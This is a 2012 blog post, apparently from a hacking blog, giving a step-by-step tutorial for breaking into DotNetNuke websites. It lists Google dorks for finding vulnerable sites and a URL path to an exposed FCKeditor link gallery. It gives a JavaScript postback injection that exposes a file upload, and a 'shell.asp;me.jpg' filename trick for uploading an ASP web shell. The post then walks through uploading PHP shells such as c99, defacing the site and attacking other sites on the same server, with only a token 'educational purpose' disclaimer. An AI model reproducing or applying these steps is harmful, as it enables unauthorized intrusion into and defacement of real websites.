Tuesday, August 28, 2012

Portal Hacking-Dot Net Nuke Hacking Tutorial



DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology.DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.

Step 1:

Go to Google

Step 2:


Now put any dork on search box and click Search


  • inurl:fcklinkgallery.aspx 
  • inurl:/portals/0
  • :inurl:/tabid/36/language/en-US/Default.aspx

Step 3:

It will show a list of many sites,select the site which you want to hack.

For example let's take this;

http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx

Step 4:


Now replace



home/tabid/36/language/en-US/Default.aspx

With this

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 

so your url will become  


http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx



Now there are 2 possibilities 


If you get Link Gallery url select then site is not vulnerable,see the image below 



and If you get Like shown in below image then target is vulnerable 


ok now if you find a vulnerable site move to next step

Step 5:


Now you can see 3 options there and we need to select “File”.


Step 6: Now after selecting option,we need to use a javascript code.For that we need to use that browser which supports javascript.Before using javascript first we need to choose file location as root,after that clear everything written on browser url and paste the below javascript only. 


javascript:__doPostBack('ctlURL$cmdUpload','') 


After injecting the above javascript code in browser address bar,you will get upload option instead of selection option.


Step 7: Now you have to upload your shell,so first upload this shell shell.asp;me.jpg


After uploading you can access your ASP shell by going to this address, 


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg 


After opening this address you will get this and upload your any php shell i.e.JackelShell.php or c99.php




Step 8:After uploading your php shell navigate to;


http://www.vulsite.com/portals/0/yourshell.asp;me.jpg 


Now upload your Deface page in the root of the site.


You can also hack all sites which are hosted on same server.
Note:Do Not Use Any Tutorial Of This Blog To Harm Anyone.This Is Only For Educational Purpose.

Size: 62.52 KB


Its password is yellowhathacker





Read more ...>>

 

Sponsor

To Top Page Up Page Down To Bottom Auto Scroll Stop Scroll